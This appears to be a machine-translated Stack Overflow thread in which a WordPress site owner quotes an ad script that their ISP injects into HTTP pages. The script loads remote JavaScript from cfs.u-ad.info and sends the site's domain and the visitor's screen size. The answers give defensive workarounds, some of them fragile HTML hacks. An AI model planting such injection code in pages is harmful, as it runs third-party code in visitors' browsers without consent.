如何清理通过ISP

时间:2015-05-06 12:00:11

标签: security code-injection ads

我的网站会被这样的脚本注入:

    <script>function netbro_cache_analytics(fn, callback) {setTimeout(function() 
{fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var 
idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r 
= Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-
ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + 
"4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRZ3f35Ig3RToKRLvWLwn6zEfnHRgrVr0WVf09gsyzoppB6HQ
lZs1%2bvVlaBJErvk4yTApvNxVRroJE3Sak6whXVhS8NtL5WQQ7xqk%2fl%2beEqRKsRzR0FuA%2bMRbKp
Tz%2fh8pwQUsZzPSHlUJaQ5eWnpe41LMxALmGAJ7wR93fB809%2b3BMdyLrPSeRjoat5eXfxM8hB8cF8FA
%2fADZ9XefsIT5mcIatvUYk00Cx89VQVB9oihM6lthSHZK76HYE2yVlBaqYl8N8lJpYpl3bTDK3nTOnpcZ
H07XEZDdhweI6oHkutA8rENrMv64HLRLfn%2fIH2yN7Q3C4Ly7sE6g9%2fkyUxZo0IvZ4NsUcBJwZ10Joo
9f63JGGYp%2bn8ZXG%2bI%2bHpuDri0qeXDPamxLkuhbs1gXAgx6ZSwZXm4940rBN97J6uiaXdZCyDo4ms
n2R%2f7i6CjiMCM66JMRM0RtI%2b4dRfZ2L78M%2bMB5T63xl0aYzBPpcoJFnNp75TozLX0wVNH7ZQLMIm
mchINjLEKPqXmlxC6kjQXWZiXrRa0nXtRY%2bUvCvz6huwCvSs3W8GNolSQ%3d%3d" + 
"&idc_r="+idc_glo_r + "&domain="+document.domain + 
"&sw="+screen.width+"&sh="+screen.height;var bsa = 
document.createElement('script');bsa.type = 'text/javascript';bsa.async = 
true;bsa.src = url;(document.getElementsByTagName('head')
[0]||document.getElementsByTagName('body')
[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){ });</script>
</body>
    </html>

u-ad.info属于管理我的ISP(TELKOM)的公司。我向他们抱怨但它永远无法解决问题。我正在使用WordPress。如何清理该脚本或阻止该脚本注入?

8 个答案:

答案 0 :(得分:3)

糟糕的ISP! :d

您无法清除该脚本,因为它在通过您的ISP服务器时被注入。您只能在浏览器级别阻止它。阅读此https://askubuntu.com/q/64303/224951。遗憾的是,使用同一ISP的所有网站访问者都将获得相同的注入页面。

我认为Google不会将您的网站列入黑名单,因为它当然没有使用您的ISP,因此无法看到注入的脚本。

答案 1 :(得分:1)

将body标签更改为大写。

我的实验表明,脚本注入器专门针对以小写字母书写的body标签的存在。 虽然,我不知道它会保持多长时间。

答案 2 :(得分:1)

答案 3 :(得分:1)

有一个非常简单的方法可以防止脚本注入。

只需在</body>标签之前添加此脚本即可。

<script>
//</body>
</script>

此图像在使用前后显示。

使用前:

Before use

使用后:

After use

如果使用wordpress,只需确保安装了插件即可在页脚部分编写该脚本。

只需在ISP TELKOM知道之前执行此操作。

答案 4 :(得分:0)

根据我的经验,您可以使用https协议或使用此技巧来避免来自ISP的加载脚本:P

<!-- </body></html> -->

在您的“真实”</body></html>标记上方添加上面的代码,让我们这样做!

答案 5 :(得分:0)

使用HTTPS(如果由服务器提供),或使用VPN / SSH隧道/安全代理。因此,所有问题都将得到解决。 ISP通过提取所有压缩,注入而不压缩回数据来注入广告和分析脚本。它将为您的Internet连接配额收取额外费用。

答案 6 :(得分:0)

已更新:Telkom ISP已检测到</body></html>是否在注释中。
我的解决方案:

完全没有</body></html>
让浏览器自行关闭标签

已经过测试,并于2018年12月生效

谢谢

答案 7 :(得分:-1)

在HTML的头部或末尾插入下面的代码。

<script type="text/javascript">
    $(document).ready(function(){
        $('body').append("</bo"+"dy>");
    });
</script>

但请确保您的HTML代码不包含</body>结束标记,并在<head>标记中包含jQuery。

示例:

完整的HTML

<html>
    <title>Foo bar</title>
    <head></head>
    <body>Lorem Ipsum</body>
</html>

成为

<html>
    <title>Foo bar</title>
    <head>
        <script src=”https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js”></script>
    </head>
    <body>Lorem Ipsum
        <script type="text/javascript">
        $(document).ready(function(){
            $('body').append("</bo"+"dy>");
            });
        </script>
</html>

没有</body>结束标记。 ISP上的HTTP过滤器将grep </body></Body>或任何<body>结束标记,然后在<body>结束标记之前注入JavaScript代码,以便其广告显示在上任何使用HTTP协议的网站。